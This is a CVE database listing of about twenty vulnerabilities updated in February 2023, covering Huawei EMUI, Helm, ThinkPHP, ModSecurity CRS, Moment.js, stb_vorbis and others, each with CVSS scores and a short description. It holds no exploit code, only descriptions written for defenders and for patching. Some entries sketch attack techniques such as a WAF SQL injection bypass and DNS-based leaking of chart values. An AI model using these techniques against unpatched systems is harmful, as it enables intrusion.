Total
210374 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-48300 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH |
| The WMS module lacks the authentication mechanism in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. | |||||
| CVE-2023-25165 | 1 Helm | 1 Helm | 2023-02-16 | N/A | 4.3 MEDIUM |
| Helm is a tool that streamlines installing and managing Kubernetes applications.`getHostByName` is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with `helm install|upgrade|template` or when the Helm SDK is used to render a chart. Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject `getHostByName` into a chart in order to disclose values to a malicious DNS server. The issue has been fixed in Helm 3.11.1. Prior to using a chart with Helm verify the `getHostByName` function is not being used in a template to disclose any information you do not want passed to DNS servers. | |||||
| CVE-2022-48298 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH |
| The geofencing kernel code does not verify the length of the input data. Successful exploitation of this vulnerability may cause out-of-bounds memory access. | |||||
| CVE-2023-25166 | 1 Hapi | 1 Formula | 2023-02-16 | N/A | 6.5 MEDIUM |
| formula is a math and string formula parser. In versions prior to 3.0.1 crafted user-provided strings to formula's parser might lead to polynomial execution time and a denial of service. Users should upgrade to 3.0.1+. There are no known workarounds for this vulnerability. | |||||
| CVE-2022-48297 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH |
| The geofencing kernel code has a vulnerability of not verifying the length of the input data. Successful exploitation of this vulnerability may cause out-of-bounds memory access. | |||||
| CVE-2022-48302 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH |
| The AMS module has a vulnerability of lacking permission verification in APIs.Successful exploitation of this vulnerability may affect data confidentiality. | |||||
| CVE-2022-38778 | 2 Decode-uri-component Project, Elastic | 2 Decode-uri-component, Kibana | 2023-02-16 | N/A | 6.5 MEDIUM |
| A flaw (CVE-2022-38900) was discovered in one of Kibana’s third party dependencies, that could allow an authenticated user to perform a request that crashes the Kibana server process. | |||||
| CVE-2022-45982 | 1 Thinkphp | 1 Thinkphp | 2023-02-16 | N/A | 9.8 CRITICAL |
| thinkphp 6.0.0~6.0.13 and 6.1.0~6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload. | |||||
| CVE-2022-48299 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH |
| The WMS module lacks the authentication mechanism in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. | |||||
| CVE-2020-22669 | 2 Debian, Owasp | 2 Debian Linux, Owasp Modsecurity Core Rule Set | 2023-02-16 | N/A | 9.8 CRITICAL |
| Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications. | |||||
| CVE-2022-26117 | 1 Fortinet | 1 Fortinac | 2023-02-16 | N/A | 8.8 HIGH |
| An empty password in configuration file vulnerability [CWE-258] in FortiNAC version 8.3.7 and below, 8.5.2 and below, 8.5.4, 8.6.0, 8.6.5 and below, 8.7.6 and below, 8.8.11 and below, 9.1.5 and below, 9.2.3 and below may allow an authenticated attacker to access the MySQL databases via the CLI. | |||||
| CVE-2022-25648 | 3 Debian, Fedoraproject, Git | 4 Debian Linux, Extra Packages For Enterprise Linux, Fedora and 1 more | 2023-02-16 | 7.5 HIGH | 9.8 CRITICAL |
| The package git before 1.11.0 are vulnerable to Command Injection via git argument injection. When calling the fetch(remote = 'origin', opts = {}) function, the remote parameter is passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection. | |||||
| CVE-2022-24785 | 5 Debian, Fedoraproject, Momentjs and 2 more | 5 Debian Linux, Fedora, Moment and 2 more | 2023-02-16 | 5.0 MEDIUM | 7.5 HIGH |
| Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js. | |||||
| CVE-2021-35368 | 3 Debian, Fedoraproject, Owasp | 3 Debian Linux, Fedora, Owasp Modsecurity Core Rule Set | 2023-02-16 | 7.5 HIGH | 9.8 CRITICAL |
| OWASP ModSecurity Core Rule Set 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.2 is affected by a Request Body Bypass via a trailing pathname. | |||||
| CVE-2023-24322 | 1 Mojoportal | 1 Mojoportal | 2023-02-16 | N/A | 6.1 MEDIUM |
| A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters. | |||||
| CVE-2020-8184 | 3 Canonical, Debian, Rack Project | 3 Ubuntu Linux, Debian Linux, Rack | 2023-02-16 | 5.0 MEDIUM | 7.5 HIGH |
| A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it is possible for an attacker to forge a secure or host-only cookie prefix. | |||||
| CVE-2019-13223 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 4.3 MEDIUM | 5.5 MEDIUM |
| A reachable assertion in the lookup1_values function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file. | |||||
| CVE-2019-13222 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 5.8 MEDIUM | 7.1 HIGH |
| An out-of-bounds read of a global buffer in the draw_line function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. | |||||
| CVE-2019-13221 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 6.8 MEDIUM | 7.8 HIGH |
| A stack buffer overflow in the compute_codewords function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or execute arbitrary code by opening a crafted Ogg Vorbis file. | |||||
| CVE-2019-13220 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 5.8 MEDIUM | 7.1 HIGH |
| Use of uninitialized stack variables in the start_decoder function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. | |||||